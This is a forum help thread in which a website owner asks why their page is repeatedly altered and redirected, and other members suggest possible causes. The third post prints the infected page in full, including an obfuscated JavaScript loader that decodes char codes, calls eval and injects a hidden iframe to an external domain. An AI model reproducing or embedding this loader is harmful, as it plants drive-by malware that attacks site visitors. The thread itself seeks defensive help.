Hello and welcome to our community! Is this your first visit?
Register
Enjoy an ad free experience by logging in. Not a member yet? Register.
Results 1 to 5 of 5
  1. #1
    New to the CF scene
    Join Date
    May 2012
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Angry Remote File Inclusion?

    Hi!

    I'm having some troubles that my Web Space Provider insists is not their problem. Can you help me?

    The domain in question is youcme.net. I have owned this domain for a few years now but went back a couple of weeks ago to start working on it again. When I checked in to the website following a long period of not checking on it, there was a message across the top of the page which read "you need to pay for this crypt". I searched online and found this to be malware.

    I deleted all my files and started anew. (I was going to do that anyway.)

    (My computer scans clean as well.)

    I created a 2-page webcam site using Dreamweaver 4.0. I added 1 Google Adsense ad and a weather widget from The Weather Network.

    I upload with WSFTP.

    I uploaded the 2 pages and the images, and everything is as it should be. The website displays as it should, on various computer, using various browsers. But then, after 6 to 8 hours, I check the website and my index page has been altered, making the front page display only my background image.

    At first, I simply uploaded again, assuming that I'd made a mistake. Then I started removing the widget or the Google ad one by one and checking to see if that solved the issue. I changed my FTP password and my password for my web space provider, who, by the way, is 1&1.com.

    I've called them 5 times and emailed firstly their tech support people and then their security team. Nothing. "It's a coding issue." Not their problem.

    So, I cleared out another of my domains (www.truckingtanker.com) and uploaded the website there. And I've had no issues. It's stayed as it should for 2 days now.

    I then created a simply one-page website with a background image and 2 sentences of text and uploaded it to youcme.net. It lasted about 8 hours and now when I go to that website, it redirects to igg.biz. I've never heard of them.

    Who is making this happen? How can I stop them?

    Frustrated.
    Last edited by Woothie; 05-12-2012 at 05:37 PM.

  • #2
    Senior Coder
    Join Date
    Feb 2009
    Location
    Ilkley, West Yorkshire, UK
    Posts
    2,950
    Thanks
    9
    Thanked 724 Times in 718 Posts
    Sounds like it might be some sort of js hack.
    Turn js off in your browser and see if you can see anything in the source that looks odd.
    Not to be overly nervous, but I'd suggest removing that link in case there's anything nasty on the other end of the redirect.

  • #3
    New to the CF scene
    Join Date
    May 2012
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts
    Thank you. Yes, the code looks odd (as follows). It is certainly not as I wrote it.

    Any idea how to solve it?


    Code:
    <html>
    <head>
    <title>Crazy!</title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    </head>
    
    <body bgcolor="#CCCC66" text="#006600" background="images/bg.jpg" link="#009933"> <script>i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c-1c81c-29c-33c-33c-33c63c60c72c55c67c59c72c-2c-1c17c-29c-33c-33c83c-10c59c66c73c59c-10c81c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c77c72c63c74c59c-2c-8c18c63c60c72c55c67c59c-10c73c72c57c19c-3c62c74c74c70c16c5c5c58c60c61c63c74c60c60c64c72c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-10c77c63c58c74c62c19c-3c7c6c-3c-10c62c59c63c61c62c74c19c-3c7c6c-3c-10c73c74c79c66c59c19c-3c76c63c73c63c56c63c66c63c74c79c16c62c63c58c58c59c68c17c70c69c73c63c74c63c69c68c16c55c56c73c69c66c75c74c59c17c66c59c60c74c16c6c17c74c69c70c16c6c17c-3c20c18c5c63c60c72c55c67c59c20c-8c-1c17c-29c-33c-33c83c-29c-33c-33c60c75c68c57c74c63c69c68c-10c63c60c72c55c67c59c72c-2c-1c81c-29c-33c-33c-33c76c55c72c-10c60c-10c19c-10c58c69c57c75c67c59c68c74c4c57c72c59c55c74c59c27c66c59c67c59c68c74c-2c-3c63c60c72c55c67c59c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c73c72c57c-3c2c-3c62c74c74c70c16c5c5c58c60c61c63c74c60c60c64c72c4c63c61c61c4c56c63c80c5c21c61c69c19c8c-3c-1c17c60c4c73c74c79c66c59c4c76c63c73c63c56c63c66c63c74c79c19c-3c62c63c58c58c59c68c-3c17c60c4c73c74c79c66c59c4c70c69c73c63c74c63c69c68c19c-3c55c56c73c69c66c75c74c59c-3c17c60c4c73c74c79c66c59c4c66c59c60c74c19c-3c6c-3c17c60c4c73c74c79c66c59c4c74c69c70c19c-3c6c-3c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c77c63c58c74c62c-3c2c-3c7c6c-3c-1c17c60c4c73c59c74c23c74c74c72c63c56c75c74c59c-2c-3c62c59c63c61c62c74c-3c2c-3c7c6c-3c-1c17c-29c-33c-33c-33c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c55c61c36c55c67c59c-2c-3c56c69c58c79c-3c-1c49c6c51c4c55c70c70c59c68c58c25c62c63c66c58c-2c60c-1c17c-29c-33c-33c83'][0].split('c');v="e"+"va";}if(v)e=window[v+"l"];try{q=document.createElement("div");q.appendChild(q+"");}catch(qwg){w=f;s=[];} r=String;z=((e)?h:"");for(;569!=i;i+=1){j=i;if(e)s=s+r["fromC"+((e)?z:12)](w[j]*1+42);} if(v&&e&&r&&z&&h)e(s);</script>
    <div align="center">
      <p>&nbsp;</p>
      <p>&nbsp;</p>
      <p>&nbsp;</p>
      <p><font size="7">This is crazy! <br>
        Leave my site alone!</font></p>
      <p>&nbsp;</p>
      <p>&nbsp;</p>
      <p><a href="mailto:contact@youcme.net">contact</a></p>
    </div>
    </body>
    </html>

  • #4
    Senior Coder
    Join Date
    Feb 2009
    Location
    Ilkley, West Yorkshire, UK
    Posts
    2,950
    Thanks
    9
    Thanked 724 Times in 718 Posts
    So that odd looking script is the problem by the looks of it.
    I'm not an expert at all in this but I guess that script could be being injected into your page by another file somewhere in your file system on the server - possibly a hangover from the previous problem.

    Certainly sounds like something for your host to me....
    If they're being unsupportive you could try having a look through all of your server files to see if you can spot anything odd, although that might be a needle in a haystack job. I guess it could be something like a cron job that's running periodically and making the change - might be worth having a look there as well.

  • #5
    Master Coder Excavator's Avatar
    Join Date
    Dec 2006
    Location
    Alaska
    Posts
    9,675
    Thanks
    22
    Thanked 1,827 Times in 1,811 Posts
    Hello Woothie,
    I've had a similar issue with a webspace provider that swore it was not on their end. Turned out something, we never figured out what, was editing my .htaccess file which would then mess up all my php includes.

    It stopped when I made the .htaccess read only.
    Validate often DURING development - Use it like a splelchecker | Debug during Development |Write it for FireFox, ignore IE
    Use the right DocType | Validate your markup | Validate your CSS | Why validating is good | Why tables are bad


  •  

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •